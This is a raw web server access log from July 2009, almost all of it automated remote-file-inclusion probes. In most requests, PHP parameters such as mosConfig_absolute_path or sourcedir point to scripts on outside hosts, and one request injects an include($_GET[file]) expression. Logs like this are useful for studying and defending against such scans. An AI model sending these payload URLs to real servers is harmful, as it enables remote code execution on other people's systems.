85.17.162.28 - - [06/Jul/2009:05:22:44 -0400] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.firearts.org/events/_a? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
85.17.162.28 - - [06/Jul/2009:05:22:44 -0400] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.firearts.org/events/_a? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
85.17.162.28 - - [06/Jul/2009:05:22:44 -0400] "GET /logs/access_log.Q109061600%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.firearts.org/events/_a? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
85.17.162.28 - - [06/Jul/2009:05:22:55 -0400] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.firearts.org/events/_a? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
85.17.162.28 - - [06/Jul/2009:05:22:55 -0400] "GET /logs/access_log.Q109061600%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.firearts.org/events/_a? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
85.17.162.28 - - [06/Jul/2009:05:22:56 -0400] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.firearts.org/events/_a? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
217.125.38.117 - - [06/Jul/2009:05:23:00 -0400] "GET /logs/access_log.Q109052100//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.51.133.202 - - [06/Jul/2009:05:23:16 -0400] "GET /logs/access_log.Q109062500%20%20//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://botscanner.michael17.com/BotId1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
209.51.133.202 - - [06/Jul/2009:05:23:17 -0400] "GET /logs/access_log.Q109062400%20%20//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://botscanner.michael17.com/BotId1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
85.17.162.28 - - [06/Jul/2009:05:23:21 -0400] "GET /logs/access_log.Q109051500%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.firearts.org/events/_a? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
85.17.162.28 - - [06/Jul/2009:05:23:30 -0400] "GET /logs/access_log.Q109051500%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.firearts.org/events/_a? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
84.201.208.50 - - [06/Jul/2009:05:23:50 -0400] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.dracocafe.pl/sklep/components/com_sef/1.r? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
84.201.208.50 - - [06/Jul/2009:05:23:50 -0400] "GET /logs/access_log.Q109050700//admin/business_inc/saveserver.php?thisdir=http://www.dracocafe.pl/sklep/components/com_sef/1.r? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
84.201.208.50 - - [06/Jul/2009:05:23:50 -0400] "GET //admin/business_inc/saveserver.php?thisdir=http://www.dracocafe.pl/sklep/components/com_sef/1.r? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
218.158.98.196 - - [06/Jul/2009:05:23:59 -0400] "GET /logs/access_log.Q109062300%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.foropoemas.es/Sources/office1.jpg??? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
125.245.146.253 - - [06/Jul/2009:05:24:00 -0400] "GET /logs/access_log.Q109061200%20%20//includes/ktedit/toolbar.php?dirDepth=http://jiao-hua.org//idade1.txt??? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
125.245.146.253 - - [06/Jul/2009:05:24:00 -0400] "GET /logs/access_log.Q109052200%20%20//includes/ktedit/toolbar.php?dirDepth=http://jiao-hua.org//idade1.txt??? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
211.189.119.184 - - [06/Jul/2009:05:24:12 -0400] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.angelcitytrading.com/css/1.zot?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
211.189.119.184 - - [06/Jul/2009:05:24:12 -0400] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.angelcitytrading.com/css/1.zot?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
211.189.119.184 - - [06/Jul/2009:05:24:12 -0400] "GET /logs/access_log.Q109051800//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.angelcitytrading.com/css/1.zot?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
218.38.136.16 - - [06/Jul/2009:05:24:41 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.peb.com.ua/ua/log.txt??? HTTP/1.1" 200 453 "-" "libwww-perl/5.79"
217.125.38.117 - - [06/Jul/2009:05:24:54 -0400] "GET /logs/access_log.Q109052300/?sourcedir=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
217.125.38.117 - - [06/Jul/2009:05:24:55 -0400] "GET /?sourcedir=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
217.125.38.117 - - [06/Jul/2009:05:24:57 -0400] "GET /logs/access_log.Q109051900/?sourcedir=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
217.125.38.117 - - [06/Jul/2009:05:25:00 -0400] "GET /logs/?sourcedir=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 200 8386 "-" "Mozilla/5.0"
211.189.119.184 - - [06/Jul/2009:05:25:15 -0400] "GET /logs/access_log.Q109062800//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.angelcitytrading.com/css/1.zot?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
209.59.12.99 - - [06/Jul/2009:05:25:35 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
61.78.62.84 - - [06/Jul/2009:05:27:18 -0400] "GET /logs//bbs//skin/zero_vote/ask_password.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:05:27:19 -0400] "GET /logs/access_log.Q109051900//bbs//skin/zero_vote/ask_password.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:05:27:19 -0400] "GET //bbs//skin/zero_vote/ask_password.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.51.133.202 - - [06/Jul/2009:05:27:20 -0400] "GET /logs/access_log.Q109062300//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://botscanner.michael17.com/BotId1.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:05:27:48 -0400] "GET /logs/access_log.Q109062800//bbs//skin/zero_vote/ask_password.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:05:27:52 -0400] "GET //bbs//skin/zero_vote/ask_password.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:05:27:52 -0400] "GET /logs//bbs//skin/zero_vote/ask_password.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:05:27:54 -0400] "GET /logs/access_log.Q109051900%20%20//bbs//skin/zero_vote/ask_password.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:05:28:08 -0400] "GET /logs/access_log.Q109051900//bbs//skin/zero_vote/ask_password.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:05:28:12 -0400] "GET //bbs//skin/zero_vote/ask_password.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:05:28:13 -0400] "GET /logs//bbs//skin/zero_vote/ask_password.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:05:28:19 -0400] "GET /logs/access_log.Q109062800//bbs//skin/zero_vote/ask_password.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:05:28:22 -0400] "GET /logs/access_log.Q109062800%20%20//bbs//skin/zero_vote/ask_password.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
218.249.36.194 - - [06/Jul/2009:05:28:59 -0400] "GET /?sourcedir=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
218.249.36.194 - - [06/Jul/2009:05:28:59 -0400] "GET /logs/access_log.Q109051900/?sourcedir=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
218.249.36.194 - - [06/Jul/2009:05:28:59 -0400] "GET /logs/?sourcedir=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 200 8386 "-" "Mozilla/5.0"
218.249.36.194 - - [06/Jul/2009:05:28:59 -0400] "GET /logs/access_log.Q109052300/?sourcedir=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
85.17.162.28 - - [06/Jul/2009:05:29:07 -0400] "GET /logs/access_log.Q109061600//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.firearts.org/events/_a? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
85.17.162.28 - - [06/Jul/2009:05:29:11 -0400] "GET /logs/access_log.Q109051500//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.firearts.org/events/_a? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
218.249.36.194 - - [06/Jul/2009:05:29:16 -0400] "GET /?sourcedir=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
218.249.36.194 - - [06/Jul/2009:05:29:16 -0400] "GET /logs/?sourcedir=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 200 8386 "-" "Mozilla/5.0"
218.249.36.194 - - [06/Jul/2009:05:29:16 -0400] "GET /logs/access_log.Q109051900/?sourcedir=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
218.249.36.194 - - [06/Jul/2009:05:29:16 -0400] "GET /logs/access_log.Q109052300/?sourcedir=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
204.9.247.53 - - [06/Jul/2009:05:29:47 -0400] "GET /logs/access_log.Q109051900/?sourcedir=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
204.9.247.53 - - [06/Jul/2009:05:29:47 -0400] "GET /?sourcedir=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 200 409 "-" "libwww-perl/5.805"
204.9.247.53 - - [06/Jul/2009:05:29:47 -0400] "GET /logs/?sourcedir=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 200 8386 "-" "libwww-perl/5.805"
204.9.247.53 - - [06/Jul/2009:05:29:48 -0400] "GET /logs/access_log.Q109051900/?sourcedir=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
204.9.247.53 - - [06/Jul/2009:05:29:48 -0400] "GET /?sourcedir=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 200 409 "-" "libwww-perl/5.805"
204.9.247.53 - - [06/Jul/2009:05:29:48 -0400] "GET /logs/?sourcedir=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 200 8386 "-" "libwww-perl/5.805"
204.9.247.53 - - [06/Jul/2009:05:29:54 -0400] "GET /logs/access_log.Q109051900/?sourcedir=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
204.9.247.53 - - [06/Jul/2009:05:29:54 -0400] "GET /?sourcedir=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 200 409 "-" "libwww-perl/5.805"
204.9.247.53 - - [06/Jul/2009:05:29:54 -0400] "GET /logs/?sourcedir=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 200 8386 "-" "libwww-perl/5.805"
98.116.62.213 - - [06/Jul/2009:05:29:58 -0400] "GET /logs//index.php?cmd&file=http://www.foropoemas.es/Sources/office1.jpg??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
87.106.179.130 - - [06/Jul/2009:05:30:00 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.recanatini.it/images/baner.png?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
87.106.179.130 - - [06/Jul/2009:05:30:00 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.recanatini.it/images/baner.png?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
87.106.179.130 - - [06/Jul/2009:05:30:00 -0400] "GET /logs/access_log.Q109060800//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.recanatini.it/images/baner.png?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
98.116.62.213 - - [06/Jul/2009:05:30:00 -0400] "GET //index.php?cmd&file=http://www.foropoemas.es/Sources/office1.jpg??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
98.116.62.213 - - [06/Jul/2009:05:30:00 -0400] "GET /logs/access_log.Q109051200%20%20//index.php?cmd&file=http://www.foropoemas.es/Sources/office1.jpg??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
204.9.247.53 - - [06/Jul/2009:05:30:10 -0400] "GET /logs/access_log.Q109052300/?sourcedir=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
204.9.247.53 - - [06/Jul/2009:05:30:12 -0400] "GET /logs/access_log.Q109052300/?sourcedir=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
204.9.247.53 - - [06/Jul/2009:05:30:17 -0400] "GET /logs/access_log.Q109052300/?sourcedir=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
209.59.12.99 - - [06/Jul/2009:05:30:35 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
98.116.62.213 - - [06/Jul/2009:05:30:44 -0400] "GET /logs/access_log.Q109062500%20%20//index.php?cmd&file=http://www.foropoemas.es/Sources/office1.jpg??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:05:32:12 -0400] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:05:32:12 -0400] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:05:32:13 -0400] "GET /logs/access_log.Q109060700//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
218.158.98.196 - - [06/Jul/2009:05:32:29 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://wmk-werkzeugmaschinen.de/log/idxx.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
218.158.98.196 - - [06/Jul/2009:05:32:29 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://wmk-werkzeugmaschinen.de/log/idxx.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
218.158.98.196 - - [06/Jul/2009:05:32:39 -0400] "GET /logs/access_log.Q109060800//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://wmk-werkzeugmaschinen.de/log/idxx.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:05:32:44 -0400] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:05:32:45 -0400] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:05:32:45 -0400] "GET /logs/access_log.Q109060700//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
87.106.179.130 - - [06/Jul/2009:05:33:01 -0400] "GET /logs/access_log.Q109051600//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.recanatini.it/images/baner.png?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
60.43.229.5 - - [06/Jul/2009:05:33:05 -0400] "GET //snippetmaster/includes/vars.inc.php?_SESSION%5BSCRIPT_PATH%5D=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 234 "-" "Mozilla/5.0"
60.43.229.5 - - [06/Jul/2009:05:33:05 -0400] "GET /logs/access_log.Q109062500//snippetmaster/includes/vars.inc.php?_SESSION%5BSCRIPT_PATH%5D=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 261 "-" "Mozilla/5.0"
60.43.229.5 - - [06/Jul/2009:05:33:05 -0400] "GET /logs//snippetmaster/includes/vars.inc.php?_SESSION%5BSCRIPT_PATH%5D=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 239 "-" "Mozilla/5.0"
218.158.98.196 - - [06/Jul/2009:05:33:19 -0400] "GET /logs/access_log.Q109051600//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://wmk-werkzeugmaschinen.de/log/idxx.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:05:33:21 -0400] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:05:33:21 -0400] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:05:33:21 -0400] "GET /logs/access_log.Q109060700%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
72.30.65.36 - - [06/Jul/2009:05:33:52 -0400] "GET /logs/error_log.Q108050100 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
84.201.208.50 - - [06/Jul/2009:05:34:29 -0400] "GET /logs/access_log.Q109051200//admin/business_inc/saveserver.php?thisdir=http://www.dracocafe.pl/sklep/components/com_sef/1.r? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
209.59.12.99 - - [06/Jul/2009:05:35:36 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
60.43.229.5 - - [06/Jul/2009:05:35:51 -0400] "GET /logs/access_log.Q109062400//snippetmaster/includes/vars.inc.php?_SESSION%5BSCRIPT_PATH%5D=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 261 "-" "Mozilla/5.0"
84.201.208.50 - - [06/Jul/2009:05:36:45 -0400] "GET /logs/access_log.Q109050700%20%20//admin/business_inc/saveserver.php?thisdir=http://www.dracocafe.pl/sklep/components/com_sef/1.r? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
66.249.68.70 - - [06/Jul/2009:05:37:07 -0400] "GET /images/items/6500004_thumb.jpg HTTP/1.1" 200 2569 "-" "Googlebot-Image/1.0"
72.253.80.190 - - [06/Jul/2009:05:37:46 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1"
218.158.98.196 - - [06/Jul/2009:05:38:42 -0400] "GET /logs/access_log.Q109052000//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.foropoemas.es/Sources/office1.jpg??? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
88.198.22.248 - - [06/Jul/2009:05:40:15 -0400] "GET /errors.php?error=http://www.kure-lionsclub.com//templates_c/cmdstate.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.803"
209.59.12.99 - - [06/Jul/2009:05:40:36 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
84.201.208.50 - - [06/Jul/2009:05:40:45 -0400] "GET /logs/access_log.Q109051200%20%20//admin/business_inc/saveserver.php?thisdir=http://www.dracocafe.pl/sklep/components/com_sef/1.r? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
218.249.36.194 - - [06/Jul/2009:05:41:49 -0400] "GET /logs/access_log.Q109051900%20%20/?sourcedir=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
60.43.229.5 - - [06/Jul/2009:05:41:57 -0400] "GET /logs/access_log.Q109062500%20%20//snippetmaster/includes/vars.inc.php?_SESSION%5BSCRIPT_PATH%5D=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 263 "-" "Mozilla/5.0"
218.249.36.194 - - [06/Jul/2009:05:42:06 -0400] "GET /logs/access_log.Q109052300%20%20/?sourcedir=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
190.248.10.179 - - [06/Jul/2009:05:42:49 -0400] "GET /logs/access_log.Q109052100%20%20//includes/db_connect.php?baseDir=http://www.recanatini.it/images/baner.png?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
190.248.10.179 - - [06/Jul/2009:05:42:49 -0400] "GET /logs//includes/db_connect.php?baseDir=http://www.recanatini.it/images/baner.png?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
190.248.10.179 - - [06/Jul/2009:05:42:49 -0400] "GET //includes/db_connect.php?baseDir=http://www.recanatini.it/images/baner.png?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
190.248.10.179 - - [06/Jul/2009:05:43:01 -0400] "GET /logs/access_log.Q109060800%20%20//includes/db_connect.php?baseDir=http://www.recanatini.it/images/baner.png?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
211.189.119.184 - - [06/Jul/2009:05:43:13 -0400] "GET /logs/access_log.Q109062800%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.angelcitytrading.com/css/1.zot?? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
211.189.119.184 - - [06/Jul/2009:05:43:18 -0400] "GET /logs/access_log.Q109051800%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.angelcitytrading.com/css/1.zot?? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
87.106.179.130 - - [06/Jul/2009:05:43:32 -0400] "GET /logs/access_log.Q109051700/s_loadenv.inc.php?DOCUMENT_ROOT=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
87.106.179.130 - - [06/Jul/2009:05:43:37 -0400] "GET /logs/s_loadenv.inc.php?DOCUMENT_ROOT=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 220 "-" "libwww-perl/5.805"
88.198.22.248 - - [06/Jul/2009:05:44:42 -0400] "GET /logs/access_log.Q109060100/accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.kure-lionsclub.com//templates_c/cmdstate.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.803"
88.198.22.248 - - [06/Jul/2009:05:44:42 -0400] "GET /accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.kure-lionsclub.com//templates_c/cmdstate.txt?? HTTP/1.1" 404 222 "-" "libwww-perl/5.803"
88.198.22.248 - - [06/Jul/2009:05:44:42 -0400] "GET /logs/accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.kure-lionsclub.com//templates_c/cmdstate.txt?? HTTP/1.1" 404 227 "-" "libwww-perl/5.803"
65.98.59.178 - - [06/Jul/2009:05:45:03 -0400] "GET /logs/access_log.Q109061200/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.scd-lunjina.org/drquek//idv6.txt???? HTTP/1.1" 404 291 "-" "libwww-perl/5.811"
65.98.59.178 - - [06/Jul/2009:05:45:03 -0400] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.scd-lunjina.org/drquek//idv6.txt???? HTTP/1.1" 404 264 "-" "libwww-perl/5.811"
65.98.59.178 - - [06/Jul/2009:05:45:03 -0400] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.scd-lunjina.org/drquek//idv6.txt???? HTTP/1.1" 404 269 "-" "libwww-perl/5.811"
65.98.59.178 - - [06/Jul/2009:05:45:08 -0400] "GET /logs/access_log.Q109061300/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.scd-lunjina.org/drquek//idv6.txt???? HTTP/1.1" 404 291 "-" "libwww-perl/5.811"
209.59.12.99 - - [06/Jul/2009:05:45:36 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.249.36.194 - - [06/Jul/2009:05:46:00 -0400] "GET /logs/access_log.Q109051900%20%20/?sourcedir=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
218.249.36.194 - - [06/Jul/2009:05:46:00 -0400] "GET /logs/access_log.Q109052300%20%20/?sourcedir=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
60.43.229.5 - - [06/Jul/2009:05:47:13 -0400] "GET /logs/access_log.Q109062400%20%20//snippetmaster/includes/vars.inc.php?_SESSION%5BSCRIPT_PATH%5D=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 263 "-" "Mozilla/5.0"
66.249.68.70 - - [06/Jul/2009:05:47:15 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L3130094C720394008941018+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.70 - - [06/Jul/2009:05:47:25 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L3130094C72B3D4008041018+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
218.234.21.178 - - [06/Jul/2009:05:47:26 -0400] "GET //include//functions.inc.php?REX[INCLUDE_PATH]=http://kq-china.com/web/templates/ja_purity/id1.txt???? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
218.234.21.178 - - [06/Jul/2009:05:47:26 -0400] "GET /logs//include//functions.inc.php?REX[INCLUDE_PATH]=http://kq-china.com/web/templates/ja_purity/id1.txt???? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
218.234.21.178 - - [06/Jul/2009:05:47:26 -0400] "GET /logs/access_log.Q109052600//include//functions.inc.php?REX[INCLUDE_PATH]=http://kq-china.com/web/templates/ja_purity/id1.txt???? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
